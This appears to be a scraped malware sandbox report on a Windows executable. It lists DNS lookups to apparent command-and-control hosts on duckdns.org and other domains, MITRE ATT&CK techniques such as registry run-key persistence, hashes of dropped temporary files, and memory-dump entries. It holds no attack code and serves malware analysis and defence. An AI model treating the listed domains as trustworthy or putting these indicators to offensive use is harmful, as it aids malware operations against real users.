157 B
1
1

DNS Request

71.31.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

140 B
156 B
2
1

DNS Request

50.23.12.20.in-addr.arpa

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

144 B
146 B
2
1

DNS Request

15.164.165.52.in-addr.arpa

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

kinltd.top

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

56 B
88 B
1
1

DNS Request

kinltd.top

DNS Response

172.67.216.75

104.21.24.17
8.8.8.8:53

75.216.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

75.216.67.172.in-addr.arpa
8.8.8.8:53

bdias.com

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

55 B
71 B
1
1

DNS Request

bdias.com

DNS Response

91.196.125.125
8.8.8.8:53

r10.o.lencr.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

61 B
160 B
1
1

DNS Request

r10.o.lencr.org

DNS Response

104.91.71.89

104.91.71.90
8.8.8.8:53

125.125.196.91.in-addr.arpa

dns

73 B
114 B
1
1

DNS Request

125.125.196.91.in-addr.arpa
8.8.8.8:53

40.13.222.173.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

40.13.222.173.in-addr.arpa
8.8.8.8:53

89.71.91.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

89.71.91.104.in-addr.arpa
8.8.8.8:53

gerfourt99lahjou2.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

150 B
182 B
2
2

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Response

192.169.69.26

DNS Response

192.169.69.26
8.8.8.8:53

gerfourt99lahjou3.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

225 B
276 B
3
3

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org
8.8.8.8:53

26.69.169.192.in-addr.arpa

dns

72 B
103 B
1
1

DNS Request

26.69.169.192.in-addr.arpa
8.8.8.8:53

gerfourt99lahjou3.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

150 B
150 B
2
2

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org
8.8.8.8:53

gerfourt99lahjou3.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

225 B
327 B
3
3

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org
8.8.8.8:53

gerfourt99lahjou3.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

225 B
276 B
3
3

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

gerfourt99lahjou3.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

75 B
126 B
1
1

DNS Request

gerfourt99lahjou3.duckdns.org
8.8.8.8:53

gerfourt99lahjou3.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

150 B
201 B
2
2

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org
8.8.8.8:53

gerfourt99lahjou3.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

75 B
126 B
1
1

DNS Request

gerfourt99lahjou3.duckdns.org
8.8.8.8:53

gerfourt99lahjou3.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

150 B
201 B
2
2

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org
8.8.8.8:53

gerfourt99lahjou3.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

75 B
126 B
1
1

DNS Request

gerfourt99lahjou3.duckdns.org
8.8.8.8:53

gerfourt99lahjou2.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

300 B
300 B
4
4

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org
8.8.8.8:53

gerfourt99lahjou2.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

300 B
300 B
4
4

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org
8.8.8.8:53

gerfourt99lahjou3.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

300 B
300 B
4
4

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org

DNS Request

gerfourt99lahjou3.duckdns.org
8.8.8.8:53

gerfourt99lahjou2.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

300 B
300 B
4
4

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org
8.8.8.8:53

gerfourt99lahjou2.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

300 B
75 B
4
1

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org

DNS Request

gerfourt99lahjou2.duckdns.org
8.8.8.8:53

gerfourt99lahjou3.duckdns.org

dns

af62406dbe38427fab6107e84cccff2d956970873557a068335ef4c5e8b32aef.exe

75 B
126 B
1
1

DNS Request

gerfourt99lahjou3.duckdns.org

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nsfC6FD.tmp

Filesize
1B

MD5
8ce4b16b22b58894aa86c421e8759df3

SHA1
13fbd79c3d390e5d6585a21e11ff5ec1970cff0c

SHA256
8254c329a92850f6d539dd376f4816ee2764517da5e0235514af433164480d7a

SHA512
2af8a9104b3f64ed640d8c7e298d2d480f03a3610cbc2b33474321ec59024a48592ea8545e41e09d5d1108759df48ede0054f225df39d4f0f312450e0aa9dd25

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FD.tmp

Filesize
2B

MD5
25bc6654798eb508fa0b6343212a74fe

SHA1
15d5e1d3b948fd5986aaff7d9419b5e52c75fc93

SHA256
8e5202705183bd3a20a29e224499b0f77a8273ee33cd93cca71043c57ad4bdfc

SHA512
5868c6241ed3cfcc5c34bfe42e4b9f5c69e74975e524771d8c9f35cafc13fd01cd943ec4d8caefee79a1f4a457e69d20b7a86f88db83a5bc3e6bd8a619972898

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FD.tmp

Filesize
3B

MD5
4e27f2226785e9abbe046fc592668860

SHA1
28b18a7f383131df509f7191f946a32c5a2e410c

SHA256
01a219245e1501fee01ce0baea8f6065ce5162cea12fa570689a07c9717be81d

SHA512
2a23585835bdb5db8175cab265566042282841efdcee8aaba8b9b5d466b0f165c0c5973033ce94bb9a8f07a956689247981ea07ac5a51408263e1653d9710adb

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FD.tmp

Filesize
4B

MD5
cde63b34c142af0a38cbe83791c964f8

SHA1
ece2b194b486118b40ad12c1f0e9425dd0672424

SHA256
65e2d70166c9a802b7ad2a87129b8945f083e5f268878790a9d1f1c03f47938d

SHA512
0559d3d34ad64ccc27e685431c24fc6ead0f645db14fa0e125a64fb67dbd158c15432c1fc5407811aac8a3486090dfbcfcbc3c6bf5aa0ec73f979ef62d14853c

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FD.tmp

Filesize
5B

MD5
e2fecc970546c3418917879fe354826c

SHA1
63f1c1dd01b87704a6b6c99fd9f141e0a3064f16

SHA256
ff91566d755f5d038ae698a2cc0a7d4d14e5273afafc37b6f03afda163768fa0

SHA512
3c4a68cbaee94f986515f43305a0e7620c14c30213d4a17db4a3e8a1b996764eb688bf733f472fc52073c2c80bb5229bb29411d7601aefe1c4370e230c341a0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FD.tmp

Filesize
6B

MD5
50484c19f1afdaf3841a0d821ed393d2

SHA1
c65a0fb7e74ffd2c9fc3a0f9aacb0f6a24b0a68b

SHA256
6923dd1bc0460082c5d55a831908c24a282860b7f1cd6c2b79cf1bc8857c639c

SHA512
d51a20d67571fe70bcd6c36e1382a3c342f42671c710090b75fcfc2405ce24488e03a7131eefe4751d0bd3aeaad816605ad10c8e3258d72fcf379e32416cbf3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FD.tmp

Filesize
7B

MD5
67cfa7364c4cf265b047d87ff2e673ae

SHA1
56e27889277981a9b63fcf5b218744a125bbc2fa

SHA256
639b68bd180b47d542dd001d03557ee2d5b3065c3c783143bc9fb548f3fd7713

SHA512
17f28a136b20b89e9c3a418b08fd8e6fcaac960872dc33b2481af2d872efc44228f420759c57724f5d953c7ba98f2283e2acc7dfe5a58cbf719c6480ec7a648b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FD.tmp

Filesize
8B

MD5
c3cb69218b85c3260387fb582cb518dd

SHA1
961c892ded09a4cbb5392097bb845ccba65902ad

SHA256
1c329924865741e0222d3ead23072cfbed14f96e2b0432573068eb0640513101

SHA512
2402fffeb89c531db742bf6f5466eee8fe13edf97b8ecfc2cace3522806b322924d1ca81dda25e59b4047b8f40ad11ae9216e0a0d5c7fc6beef4368eb9551422

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FD.tmp

Filesize
9B

MD5
2b3884fe02299c565e1c37ee7ef99293

SHA1
d8e2ef2a52083f6df210109fea53860ea227af9c

SHA256
ae789a65914ed002efb82dad89e5a4d4b9ec8e7faae30d0ed6e3c0d20f7d3858

SHA512
aeb9374a52d0ad99336bfd4ec7bb7c5437b827845b8784d9c21f7d96a931693604689f6adc3ca25fad132a0ad6123013211ff550f427fa86e4f26c122ac6a0fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfC6FD.tmp

Filesize
10B

MD5
9a53fc1d7126c5e7c81bb5c15b15537b

SHA1
e2d13e0fa37de4c98f30c728210d6afafbb2b000

SHA256
a7de06c22e4e67908840ec3f00ab8fe9e04ae94fb16a74136002afbaf607ff92

SHA512
b0bffbb8072dbdcfc68f0e632f727c08fe3ef936b2ef332c08486553ff2cef7b0bcdb400e421a117e977bb0fac17ce4706a8097e32d558a918433646b6d5f1a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjC3BF.tmp\System.dll

Filesize
12KB

MD5
12b140583e3273ee1f65016becea58c4

SHA1
92df24d11797fefd2e1f8d29be9dfd67c56c1ada

SHA256
014f1dfeb842cf7265a3644bc6903c592abe9049bfc7396829172d3d72c4d042

SHA512
49ffdfa1941361430b6acb3555fd3aa05e4120f28cbdf7ceaa2af5937d0b8cccd84471cf63f06f97cf203b4aa20f226bdad082e9421b8e6b62ab6e1e9fc1e68a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsxCCDA.tmp

Filesize
15B

MD5
64c34dda0003aa56030f5cef66dd8616

SHA1
8f3f9e66c5b9d35715b3c6d8aa800450f6db95fb

SHA256
a3f3ef6dbcdd25537eb2d093b42fcb85c2e84522ae1aab7bf924dc00eb3ef870

SHA512
0f01df79160393b6e7c6ea2d302bd9c1613a269ca0cb09d300d6c98dbff12e0aa3456e89c16842de77353c32edb4df565ac0709a66dc48375088f8dbba3b277f

Download Submit
memory/400-571-0x00000000772C8000-0x00000000772C9000-memory.dmp

Filesize
4KB

Download
memory/400-572-0x0000000077241000-0x0000000077361000-memory.dmp

Filesize
1.1MB

Download
memory/400-574-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-585-0x0000000077241000-0x0000000077361000-memory.dmp

Filesize
1.1MB

Download
memory/400-581-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-587-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-586-0x0000000000483000-0x0000000000484000-memory.dmp

Filesize
4KB

Download
memory/400-588-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-590-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-591-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-592-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-593-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-594-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-595-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-596-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-597-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-598-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-599-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-600-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-603-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-604-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-605-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-606-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-607-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-608-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-609-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-610-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-612-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-613-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-614-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-615-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-616-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-617-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-618-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-619-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-620-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-621-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-622-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-623-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-624-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-625-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-626-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-628-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-629-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-630-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-631-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-632-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-633-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-634-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-635-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-637-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-638-0x0000000000483000-0x0000000000484000-memory.dmp

Filesize
4KB

Download
memory/400-639-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-640-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-641-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-642-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-643-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-644-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-645-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-646-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-647-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-648-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-649-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-650-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-651-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-652-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-653-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-654-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-655-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-656-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-657-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-658-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-659-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-660-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-661-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/400-662-0x0000000000450000-0x00000000016A4000-memory.dmp

Filesize
18.3MB

Download
memory/1172-569-0x0000000077241000-0x0000000077361000-memory.dmp

Filesize
1.1MB

Download
memory/1172-570-0x0000000073F25000-0x0000000073F26000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15